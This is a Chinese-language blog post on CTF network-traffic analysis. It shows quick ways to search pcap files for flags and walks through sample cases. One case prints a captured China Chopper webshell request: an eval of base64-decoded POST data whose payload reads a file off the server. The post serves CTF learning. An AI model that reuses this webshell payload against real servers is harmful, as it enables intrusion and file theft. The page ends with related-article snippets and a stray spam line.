<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    CTF之流量分析

    VSole2021-10-08 06:29:38

    CTF雜項中存在一種題型——流量分析,主要是給你一個流量包,讓你分析獲取其中的flag的值。

    有5種方式,可以直接查找flag。

    1、直接搜索

    2、使用notepad++等軟件,直接打開流量包,搜索關鍵字

    3、編寫python腳本

    #encoding:utf-8#用二進制方式讀取文件file=open("networking.pcap","rb")#讀取文件內容i=file.read()#查找字段a1=i.find("flag{")a2=i.find("}",a1)#將查找的字段,組合起來a3=i[a1:a2+1]print a3
    

    4、windows cmd命令

    type networking.pcap | findstr "flag"

    5、linux string 命令

    strings networking.pcap | grep flag

    實戰

    案例一:

    案例二:

    使用wireshare打開pcap包,顯示tcp流

    好像已經找到了密碼,但是有點不對勁,hex dump一下看看。

    7f對應的ascII碼是DEL,是刪除,0D代表的是回車。

    因此flag是backdoor00Rm8ate

    案例三:簡單文件提取

    wireshark讀取pcap包,追蹤TCP流,

    將post請求,進行url及base64解碼,發現好像是菜刀客戶端流量,使用菜刀客戶端下載了x.tar.gz文件。

    ISG2014=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();&z1=/var/www/html/x.tar.gz
    

    因此,接下來,我們需要從數據包提取該文件,使用winhex來提取。

    沒有復現成功,每天研究:

    類似題型:

    https://www.pianshen.com/article/42121685884/

    案例四:

    未完待續。。。



    ctf
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    CTF-web--命令注入
    2023-03-31 09:51:35
    大佬總結的文章,本篇文章閱讀時間大約30分鐘。一 、基本原理 命令注入指的是,利用沒有驗證過的惡意命令或代碼,對網站或服務器進行滲透攻擊。注入有很多種,并不僅僅只有SQL注入。Injection)客戶端腳本攻擊(Script?injection)動態函數注入攻擊(Dynamic?Evaluation)序列化注入&對象注入。這種題目又哪些常見的,一個是我們常用的文件包含,我們是可以使用system等函數的,或者是php函數,應該也屬于命令注入的范疇。類似于 ?
    CTF反序列化入門
    2022-07-11 16:27:22
    這兩個過程結合起來,可以輕松地存儲和傳輸數據。就是將對象的狀態信息寫成一串字符,以便傳輸和保存。
    1.注釋符繞過 常用的注釋符有: 1)-- 注釋內容 2)# 注釋內容 3)/*注釋內容*/ eg:union select 1,2# union select 1,2 --+ 構造閉合 ’ union select 1,2’
    CTF或過WAF的sql注入繞過姿勢總結
    前言本文主要著眼于glibc下的一些漏洞及利用技巧和IO調用鏈,由淺入深,分為 “基礎堆利用漏洞及基本IO攻擊” 與 “高版本glibc下的利用” 兩部分來進行講解,前者主要包括了一些glibc相關的基礎知識,以及低版本glibc下常見的漏洞利用方式,后者主要涉及到一些較新的glibc下的IO調用鏈。
    CTFd動態靶機搭建筆記
    2022-04-28 22:00:10
    動態靶機搭建
    CTF盲水印詳解
    2022-01-18 14:42:20
    盲水印的出現頻率是相當高
    0x01 前言在2021年10月15日的“中國能源網絡安全大賽”,筆者對WEB題目進行了嘗試,幸運的做出了所有題目。0x02 ezphp這是一道很簡單的題目,同時也被大家刷成了簽到題。
    CTF密碼學-加解密總結
    2021-10-18 15:14:29
    密碼學(在西歐語文中,源于希臘語kryptós“隱藏的”,和gráphein“書寫”)是研究如何隱密地傳遞信息的學科。 在現代特別指對信息以及其傳輸的數學性研究,常被認為是數學和計算機科學的分支,和信息論也密切相關。 著名的密碼學者Ron Rivest解釋道:“密碼學是關于如何在敵人存在的環境中通訊”,自工程學的角度,這相當于密碼學與純數學的異同。 密碼學是信息安全等相關議題,如認證、訪問控
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类